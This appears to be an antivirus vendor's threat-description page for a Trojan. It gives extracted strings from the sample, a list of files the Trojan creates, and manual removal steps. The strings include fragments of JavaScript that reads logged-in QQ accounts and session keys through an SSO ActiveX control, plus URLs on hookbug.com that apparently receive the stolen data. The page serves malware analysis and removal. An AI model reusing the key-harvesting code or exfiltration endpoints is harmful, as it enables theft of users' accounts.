&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
http://ptlogin2.qq.com/jump?clientuin=
QQnologin
SSOAxCtrlForPTLogin.SSOForPTLogin2
http://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g
WinHttp.WinHttpRequest.5.1
for(var i=0,len=str.length;i
hash =(hash<<5) str.charCodeAt(i);
skey=
&ua=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322)
http://qun.qzone.qq.com/cgi-bin/get_group_list?groupcount=4&count=4&callbackFun=_GetGroupPortal&uin=
http://
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
var jie = document.createStyleSheet();jie.addRule('html','overflow:hidden;');
text|password|file
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
http://www.hookbug.com:5151/
http://www.hookbug.com:5151/qunb.htmlr
http://www.hookbug.com:5151/qq.htmlr
www.soso.comv
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
%d / %d
Bogus message code %d
(%d-%d):
%ld%c
www.dywt.com.cn
(*.htm;*.html)|*.htm;*.html
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
1, 0, 6, 6
- Skin.dll
rtmp%d
Crypt32.dll
mscoree.dll
4.20.0
Unrar.dll
(*.*)
1.0.0.0
{"{$|%~%
DBUNg[yg
00>BLTWebuk
%'%5%D%P%['d,l4r
 y%r$i$^%U N.G4B7<;9<5<0;)5"0
g~\tPiD^9T.K%D
@"<)7,20 2$2
9$5)0, .$.
9"5'0 )."0
2$,%'' '
0",%')" 
\e5.0\e.exe
8.1.0.0
WWW.52JWXX.COM
WWW.52JWXX.COM

%original file name%.exe_1368_rwx_00401000_000D6000:




t$(SSh
~%UVW
u$SShe






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\btn_del[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\pb_v.min.1.9[1].js (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sugg_ajaj.v.5.2[2].js (501 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\jquery-1.6.min[1].js (5296 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (187 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\logo_index[1].png (1797 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\fav[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3F.tmp (4545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@soso[2].txt (330 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (304 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\link[1].jpg (1190 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\link[1].jpg (2870 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\40.tmp (3361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\year[1].jsp (48 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\year[1].jsp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\button_10[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\qunb[1].htm (258 bytes)
    %System%\drivers\etc\hosts (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (606 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@soso[1].txt (180 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sugg_ajaj.v.5.2[1].js (1785 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\soso[1].png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ico_icp[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\soso[1] (600 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\icon_index[1].png (440 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (160 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\q[1].htm (5797 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\group[1].png (1 bytes)
    C:\¾¢ÎèЦЦ-Ψһ¹ÙÍø.url (112 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ico_src[1].png (2623 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\pb_v.min.1.9[1].js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\q[1].se&unc=&query=¾¢ÎèЦЦ (5370 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\41.tmp (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\jquery-1.6.min[2].js (5776 bytes)
    C:\ʹÓñؿ´.txt (4 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (6748 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\logo130826[1].png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\soso[1].htm (383 bytes)
    C:\VIPЦЦ-¹ºÂòÁ´½Ó.url (166 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\qq[1].htm (229 bytes)
    

    4. 

  4. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    
    127.0.0.1       localhost
    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now